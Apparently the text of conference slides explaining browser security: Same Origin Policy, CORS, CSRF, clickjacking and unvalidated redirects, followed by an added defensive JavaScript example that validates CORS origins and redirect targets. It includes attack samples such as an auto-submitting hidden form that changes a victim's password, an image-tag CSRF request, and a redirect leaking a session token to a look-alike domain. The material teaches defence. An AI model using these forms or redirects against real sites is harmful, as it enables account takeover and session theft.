WHY DO BROWSERS GIVE YOUR DATA TO HACKERS?
Artem Zinenko <[email protected]>
XSS CSRF
UNVALIDATED REDIRECT CLICKJACKING
GET /index.html
GET /image.png
CROSS DOMAIN REQUESTS
site.com  ->  GET /emails  ->  gmail.com
Same Origin Policy
protocol://host:port
https://site.com vs http://site.com  (different protocol)
https://a.site.com vs https://site.com:9090  (different host and port)
CROSS ORIGIN RESOURCE SHARING
SIMPLE (NON-PREFLIGHTED) REQUESTS
METHODS: GET, HEAD, POST
HEADERS: Accept, Accept-Language, Content-Language, Content-Type
CONTENT-TYPE: application/x-www-form-urlencoded, multipart/form-data, text/plain
var r = new XMLHttpRequest();
r.open('GET', 'http://site2.com', true);
r.send();
GET / HTTP/1.1
Host: site2.com
Origin: http://site1.com/
HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://site1.com
[Data]
var r = new XMLHttpRequest();
r.open('GET', 'http://site2.com', true);
r.withCredentials = true;
r.send();
GET / HTTP/1.1
Host: site2.com
Origin: http://site1.com/
Cookie: token=ab7…
HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://site1.com
Access-Control-Allow-Credentials: true
[Data]
PREFLIGHTED REQUESTS
var r = new XMLHttpRequest();
r.open('POST', 'http://site2.com', true);
r.setRequestHeader('Content-Type', 'application/json');
r.setRequestHeader('X-HEADER', 'lalala');
r.send(data);
OPTIONS / HTTP/1.1
Host: site2.com
Origin: http://site1.com/
Access-Control-Request-Method: POST
Access-Control-Request-Headers: X-HEADER
HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://site1.com
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Headers: X-HEADER
POST / HTTP/1.1
Host: site2.com
Origin: http://site1.com/
X-HEADER: lalala
Content-Type: application/json
[Data]
HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://site1.com
[Data]
Cross-origin reads
var r = new XMLHttpRequest();
r.open('GET', 'http://site2.com', true);
r.withCredentials = true;
r.send();
Cross-origin writes
var c = new XMLHttpRequest();
c.withCredentials = true;
c.open("POST", ...);
c.setRequestHeader("Content-Type", "...");
c.send(...);
Cross-origin embedding
$('…').append(
  '<img src="…">'
);
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
POST /profile
name: art
password: 78330…
retypedPassword: 2c84…
<form method="POST" action="http://service.com/profile">
<input type="hidden" name="name" value="[email protected]" />
<input type="hidden" name="password" value="78330…" />
<input type="hidden" name="retypedPassword" value="2c84…" />
</form>
<form method="POST" action="http://service.com/profile">
<input type="hidden" name="name" value="art" />
<input type="hidden" name="password" value="78330…" />
<input type="hidden" name="retypedPassword" value="2c84…" />
</form>
<script>window.onload = function () { …form.submit(); }</script>
POST /profile  (name, password)
GET evil.com
Cross Site Request Forgery
POST /user
email: [email protected]
<img src="https://.../confirm?code=67a50…" />
UNVALIDATED REDIRECT
https://site.com/login?back=https%3A%2F%2Fqqq.site.com
SUBDOMAIN
HTTP/1.1 302 Found
Location: https://qqq.site.com/
Set-Cookie: token=djnD…; domain=.site.com;
https://site.com/login?back=https%3A%2F%2Fqqq-site.com
ANOTHER DOMAIN
HTTP/1.1 302 Found
Location: https://qqq-site.com/?token=djnD…
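Added example, not code from the talk: one host check shared by the two decisions the slides raise, which Origin a CORS response may echo (never "*" together with Allow-Credentials) and which "back" URL the login page may redirect to, so that qqq.site.com passes and qqq-site.com does not. It assumes the service lives at site.com and is served over https only.

```javascript
// Added example, not from the talk. Assumed: the service lives at site.com
// and is served over https only, so http origins and targets are rejected.
const BASE_DOMAIN = 'site.com';

// True for site.com itself and any subdomain (qqq.site.com); false for
// look-alikes such as qqq-site.com or site.com.evil.net.
function isTrustedHost(hostname) {
  const h = hostname.toLowerCase();
  return h === BASE_DOMAIN || h.endsWith('.' + BASE_DOMAIN);
}

// CORS: echo the request's Origin only when it is trusted, so credentials
// are never exposed to an arbitrary site. Returns the headers to add,
// or null when no CORS headers should be sent at all.
function corsHeaders(origin) {
  let u;
  try { u = new URL(origin); } catch (_e) { return null; }
  if (u.protocol !== 'https:' || !isTrustedHost(u.hostname)) return null;
  return {
    // u.origin is protocol://host:port with no path, which is exactly what
    // the browser compares; '*' is never combined with credentials here.
    'Access-Control-Allow-Origin': u.origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Unvalidated redirect: accept the login page's "back" parameter only when
// it points at the base domain or a subdomain over https; anything else
// (qqq-site.com, javascript:, a relative string) falls back to a fixed path.
function safeRedirectTarget(back, fallback = '/') {
  let u;
  try { u = new URL(back); } catch (_e) { return fallback; }
  if (u.protocol !== 'https:' || !isTrustedHost(u.hostname)) return fallback;
  return u.href;
}
```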
https://speakerdeck.com/ar7z1/happydev-2015